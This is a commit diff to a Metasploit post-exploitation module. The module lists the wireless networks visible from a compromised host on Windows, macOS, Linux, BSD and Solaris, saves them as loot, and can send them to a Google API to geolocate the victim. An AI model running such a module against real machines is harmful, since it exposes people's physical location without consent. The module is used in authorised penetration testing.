Update wlan_geolocate.rb

Updated based on feedback. Also added enumeration only support for BSD and Solaris.
2014-04-24 07:04:50 -05:00 · 2014-04-24 07:04:50 -05:00 · d4c0d015c1
parent 2fd004b69e
commit d4c0d015c1
1 changed files with 112 additions and 56 deletions
--- a/modules/post/multi/gather/wlan_geolocate.rb
+++ b/modules/post/multi/gather/wlan_geolocate.rb
@ -12,15 +12,21 @@ class Metasploit3 < Msf::Post

  def initialize(info={})
    super( update_info( info,
-        'Name'          => 'Multiplatform Wireless LAN Geolocation',
-        'Description'   => %q{ Geolocate the target device by gathering local
-        wireless networks and performing a lookup against Google APIs.},
+        'Name'          => 'Multiplatform WLAN Enumeration and Geolocation',
+        'Description'   => %q{ Enumerate wireless networks visible to the target device.
+        Optionally geolocate the target by gathering local wireless networks and
+        performing a lookup against Google APIs.},
        'License'       => MSF_LICENSE,
        'Author'        => [ 'Tom Sellers <tom <at> fadedcode.net>'],
-        'Platform'      => %w{ osx win linux },
+        'Platform'      => %w{ osx win linux bsd solaris },
        'SessionTypes'  => [ 'meterpreter', 'shell' ],
      ))

+      register_options(
+        [
+        OptBool.new('GEOLOCATE', [ false, 'Use Google APIs to geolocate Linux, Windows, and OS X targets.', false])
+        ], self.class)
+
  end

  def get_strength(quality)
@ -81,62 +87,13 @@ class Metasploit3 < Msf::Post
    return wlan_list
  end

+  def perform_geolocation(wlan_list)

-  # Run Method for when run command is issued
-  def run
-    if session.type =~ /shell/
-      # Use the shell platform for selecting the command
-      platform = session.platform
-    else
-      # For Meterpreter use the sysinfo OS since java Meterpreter returns java as platform
-      platform = session.sys.config.sysinfo['OS']
-    end
-
-
-    case platform
-    when /win/i
-
-      listing = cmd_exec('netsh wlan show networks mode=bssid')
-      if listing.nil?
-        print_error("Unable to generate wireless listing..")
-        return nil
-      else
-        store_loot("host.windows.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
-        wlan_list = parse_wireless_win(listing)
-      end
-
-    when /osx/i
-
-      listing = cmd_exec('/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s')
-      if listing.nil?
-        print_error("Unable to generate wireless listing..")
-        return nil
-      else
-        store_loot("host.osx.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
-        wlan_list = parse_wireless_osx(listing)
-      end
-
-    when /linux/i
-
-      listing = cmd_exec('iwlist scanning')
-      if listing.nil?
-        print_error("Unable to generate wireless listing..")
-        return nil
-      else
-        store_loot("host.linux.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
-        wlan_list = parse_wireless_linux(listing)
-      end
-    else
-      print_error("The target's platform is not supported at this time.")
-      return nil
-    end
-
-    if wlan_list.nil? || wlan_list.empty?
+    if wlan_list.blank?
      print_error("Unable to enumerate wireless networks from the target.  Wireless may not be present or enabled.")
      return
    end

-
    # Build and send the request to Google
    url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}"
    uri = URI.parse(URI.encode(url))
@ -154,9 +111,108 @@ class Metasploit3 < Msf::Post
      print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.")
      print_status("Google Maps URL:  https://maps.google.com/?q=#{latitude},#{longitude}")
    else
-      print_error("Failure connecting to Google for location lookup")
+      print_error("Failure connecting to Google for location lookup.")
    end

+  end
+
+
+  # Run Method for when run command is issued
+  def run
+    if session.type =~ /shell/
+      # Use the shell platform for selecting the command
+      platform = session.platform
+    else
+      # For Meterpreter use the sysinfo OS since java Meterpreter returns java as platform
+      platform = session.sys.config.sysinfo['OS']
+    end
+
+
+    case platform
+    when /win/i
+
+      listing = cmd_exec('netsh wlan show networks mode=bssid')
+      if listing.nil?
+        print_error("Unable to generate wireless listing.")
+        return nil
+      else
+        store_loot("host.windows.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+        # The wireless output does not lend itself to displaying on screen for this platform.
+        print_status("Wireless list saved to loot.")
+        if datastore['GEOLOCATE']
+          wlan_list = parse_wireless_win(listing)
+          perform_geolocation(wlan_list)
+          return
+        end
+      end
+
+    when /osx/i
+
+      listing = cmd_exec('/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s')
+      if listing.nil?
+        print_error("Unable to generate wireless listing.")
+        return nil
+      else
+        store_loot("host.osx.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+        print_status("Target's wireless networks:\n\n#{listing}\n")
+        if datastore['GEOLOCATE']
+          wlan_list = parse_wireless_osx(listing)
+          perform_geolocation(wlan_list)
+          return
+        end
+      end
+
+    when /linux/i
+
+      listing = cmd_exec('iwlist scanning')
+      if listing.nil?
+        print_error("Unable to generate wireless listing.")
+        return nil
+      else
+        store_loot("host.linux.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+        # The wireless output does not lend itself to displaying on screen for this platform.
+        print_status("Wireless list saved to loot.")
+        if datastore['GEOLOCATE']
+          wlan_list = parse_wireless_linux(listing)
+          perform_geolocation(wlan_list)
+          return
+        end
+      end
+
+    when /solaris/i
+
+      listing = cmd_exec('dladm scan-wifi')
+      if listing.blank?
+        print_error("Unable to generate wireless listing.")
+        return nil
+      else
+        store_loot("host.solaris.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+        print_status("Target's wireless networks:\n\n#{listing}\n")
+        print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE']
+        return
+      end
+
+    when /bsd/i
+
+      interface = cmd_exec("dmesg | grep -i wlan | cut -d ':' -f1 | uniq")
+      # Printing interface as this platform requires the interface to be specified
+      # it might not be detected correctly.
+      print_status("Found wireless interface: #{interface}")
+      listing = cmd_exec("ifconfig #{interface} scan")
+      if listing.blank?
+        print_error("Unable to generate wireless listing.")
+        return nil
+      else
+        store_loot("host.bsd.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+        print_status("Target's wireless networks:\n\n#{listing}\n")
+        print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE']
+        return
+      end
+
+    else
+      print_error("The target's platform, #{platform}, is not supported at this time.")
+      return nil
+    end

    rescue Rex::TimeoutError, Rex::Post::Meterpreter::RequestError
    rescue ::Exception => e